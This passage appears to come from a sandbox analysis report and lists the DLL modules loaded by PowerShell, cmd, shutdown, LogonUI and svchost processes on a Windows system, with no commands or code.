                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: avicap32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvfw32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winmm.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\shutdown.exe | Section loaded: shutdownext.dll
Source: C:\Windows\System32\shutdown.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: logoncontroller.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: slc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dwmapi.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: windows.ui.logon.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: wincorlib.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: windows.ui.xamlhost.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: windows.ui.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: inputhost.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: languageoverlayutil.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: windows.ui.xaml.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: windows.globalization.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: directmanipulation.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: windows.ui.xaml.controls.dll
Source: C:\Windows\System32\LogonUI.exe | Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
